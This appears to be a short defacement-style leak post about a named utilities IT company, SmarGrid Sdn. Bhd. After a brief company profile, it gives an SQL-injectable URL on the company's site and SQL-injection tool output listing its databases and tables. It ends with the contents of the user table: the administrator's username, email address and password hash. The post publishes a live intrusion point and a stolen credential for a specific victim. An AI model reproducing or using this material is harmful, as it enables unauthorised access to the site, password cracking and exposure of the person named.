.com 	commercial

Inovaantage

SmarGrid Sdn. Bhd.

SmarGrid Pte. Ltd.

Is an IT & OT Solution and Service provider for Telecommunications, Transportation and Utilities

Areas of expertise:

Azure cloud migration and Cyber ​​Security implementation and testing
Asset Management
Wireless workforce management
GIS Application, migration and data management and BIM.
ADMS, Smart Billing application, Smart Meter Application, Network Management and Non-technical losses, Demand side response, Voltage Change Optimization.

https://smartgrid-sdnbhd.com/project.php?id=5

available databases [2]:
[+] information_schema
[+] smartgridsdnbhd_sgdemo

[16 tables]
+--------------+
| tbl_contact  |
| tbl_content  |
| tbl_copy     |
| tbl_event    |
| tbl_images   |
| tbl_leaders  |
| tbl_page     |
| tbl_pages    |
| tbl_partners |
| tbl_service  |
| tbl_services |
| tbl_site     |
| tbl_slider   |
| tbl_social   |
| tbl_user     |
| tbl_videos   |
+--------------+

Database: smartgridsdnbhd_sgdemo
Table: tbl_user
[1 entry]
+-------+----------+----------------------------+----------------------------------+
| name  | username | email                      | password                         |
+-------+----------+----------------------------+----------------------------------+
| Admin | admin    | kumar@smartgrid-sdnbhd.com | b4d88f329d83f219c8c7c4dfb0576495 |
+-------+----------+----------------------------+----------------------------------+
